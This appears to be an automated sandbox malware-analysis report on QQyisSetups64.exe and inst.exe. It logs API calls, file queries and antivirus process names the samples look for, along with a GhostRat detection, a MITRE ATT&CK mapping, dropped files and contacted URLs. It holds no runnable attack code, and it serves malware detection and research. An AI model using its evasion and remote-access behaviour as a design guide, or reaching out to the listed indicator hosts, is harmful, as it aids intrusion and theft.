Source: C:\Users\user\Downloads\inst.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	15_2_00B07569
Source: C:\Users\user\Downloads\inst.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	15_2_00B07AEE
Source: C:\Users\user\Downloads\inst.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	15_2_00B07A4B
Source: C:\Users\user\Downloads\inst.exe	Code function: GetLocaleInfoA,	15_2_6C6A6445
Source: C:\Users\user\Downloads\inst.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	15_2_6C6A607E
Source: C:\Users\user\Downloads\inst.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	15_2_6C6A6017
Source: C:\Users\user\Downloads\inst.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	15_2_6C6A60BA
Source: C:\Users\user\Downloads\inst.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	15_2_6C6A7C17
Source: C:\Users\user\Downloads\inst.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,	15_2_6C6A7AD8
Source: C:\Users\user\Downloads\inst.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	15_2_6C6A7AA4
Source: C:\Users\user\Downloads\inst.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	15_2_6C69B79C
Source: C:\Users\user\Downloads\inst.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	15_2_6C6A4EFF
Source: C:\Users\user\Downloads\inst.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	15_2_6C694697

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\{4CFE9941-4698-4699-A247-0D1E422E339F}.tmp VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\{A161C916-3730-49ee-83E0-3AC161379AC4}.tmp VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\{939E192B-95AD-4c61-BAEB-66F162E25721}.tmp VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\QQyisSetups64.exe

Code function: 3_2_100113E9 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_100113E9

Source: C:\Users\user\Downloads\inst.exe

Code function: 15_2_00AC8A46 _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW,

15_2_00AC8A46

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Code function: 6_2_03795D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

6_2_03795D22

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Code function: 6_2_03786A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,

6_2_03786A70

Source: QQyisSetups64.exe	Binary or memory string: vsserv.exe
Source: QQyisSetups64.exe	Binary or memory string: avcenter.exe
Source: QQyisSetups64.exe	Binary or memory string: cfp.exe
Source: inst.exe	Binary or memory string: SuperKiller.exe
Source: QQyisSetups64.exe	Binary or memory string: rtvscan.exe
Source: QQyisSetups64.exe	Binary or memory string: TMBMSRV.exe
Source: inst.exe	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360Safe.exe
Source: inst.exe	Binary or memory string: \SuperKiller.exe
Source: QQyisSetups64.exe	Binary or memory string: avgwdsvc.exe
Source: inst.exe	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: inst.exe	Binary or memory string: firstaid\superkiller.exe
Source: inst.exe, 00000010.00000002.1461047607.0000000001107000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: inst.exe	Binary or memory string: Software\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: QQyisSetups64.exe	Binary or memory string: K7TSecurity.exe
Source: QQyisSetups64.exe	Binary or memory string: acs.exe
Source: QQyisSetups64.exe	Binary or memory string: kxetray.exe
Source: QQyisSetups64.exe	Binary or memory string: KSafeTray.exe
Source: QQyisSetups64.exe	Binary or memory string: avp.exe
Source: inst.exe, inst.exe, 00000010.00000002.1461047607.0000000001107000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 360safe.exe
Source: QQyisSetups64.exe	Binary or memory string: 360Safe.exe
Source: inst.exe	Binary or memory string: 360tray.exe
Source: QQyisSetups64.exe	Binary or memory string: ashDisp.exe
Source: QQyisSetups64.exe	Binary or memory string: 360Tray.exe
Source: QQyisSetups64.exe	Binary or memory string: AYAgent.aye
Source: QQyisSetups64.exe	Binary or memory string: RavMonD.exe
Source: QQyisSetups64.exe	Binary or memory string: QUHLPSVC.EXE
Source: QQyisSetups64.exe	Binary or memory string: Mcshield.exe

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match

File source: Process Memory Space: QQyisSetups64.exe PID: 7892, type: MEMORYSTR

Queries disk data (e.g. SMART data)

Source: C:\Users\user\Downloads\inst.exe	Device IO: \Device\Harddisk0\DR0			Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Device IO: \Device\Harddisk0\DR0			Jump to behavior

Remote Access Functionality

Yara detected GhostRat

Source: Yara match

File source: Process Memory Space: QQyisSetups64.exe PID: 7892, type: MEMORYSTR

Source: C:\Users\user\Desktop\QQyisSetups64.exe	Code function: 3_2_1000EE80 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcBindingSetAuthInfoExA,RpcStringFreeW,		3_2_1000EE80
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Code function: 3_2_0286EE57 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcBindingSetAuthInfoExA,RpcStringFreeW,		3_2_0286EE57

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	141 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	3 Native API	1 Bootkit	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	223 Process Injection	2 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	141 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	4 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	246 System Information Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Masquerading	Cached Domain Credentials	1 Query Registry	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	451 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	141 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	13 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	223 Process Injection	Network Sniffing	11 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Bootkit	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Indicator Removal	Keylogging	1 System Network Configuration Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QQyisSetups64.exe	0%	Virustotal		Browse
QQyisSetups64.exe	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\inst[1].exe	17%	ReversingLabs
C:\Users\user\AppData\Local\Temp\{530B0790-97BF-4550-8023-6D8CB41E16CA}.tmp\360P2SP.dll	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QQyisSetups64.exe	0%	ReversingLabs
C:\Users\user\Downloads\inst.exe	17%	ReversingLabs

Source	Detection	Scanner	Label
http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cab	0%	Avira URL Cloud	safe
http://wpad.%s/wpad.dat	0%	Avira URL Cloud	safe
http://%s/wpad.dat	0%	Avira URL Cloud	safe
http://pinst.360.cn/360safe/h_inst.cab?rd=10788264XXQ	0%	Avira URL Cloud	safe
http://%s/%s.trt	0%	Avira URL Cloud	safe
http://pinst.360.cn/360safe/h_inst.cab?rd=10788264Hl	0%	Avira URL Cloud	safe
http://crl.microqz	0%	Avira URL Cloud	safe
https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/l	0%	Avira URL Cloud	safe
http://pinst.360.cn/zhuomian/desktopsafe.cab	0%	Avira URL Cloud	safe
http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab	0%	Avira URL Cloud	safe
http://%s/gf/360ini.cab	0%	Avira URL Cloud	safe
http://pinst.360.cn/360safe/h_inst.cab?rd=10788264HTTP:XX-	0%	Avira URL Cloud	safe
http://sfdw.360safe.com/setup.exe.exe	0%	Avira URL Cloud	safe
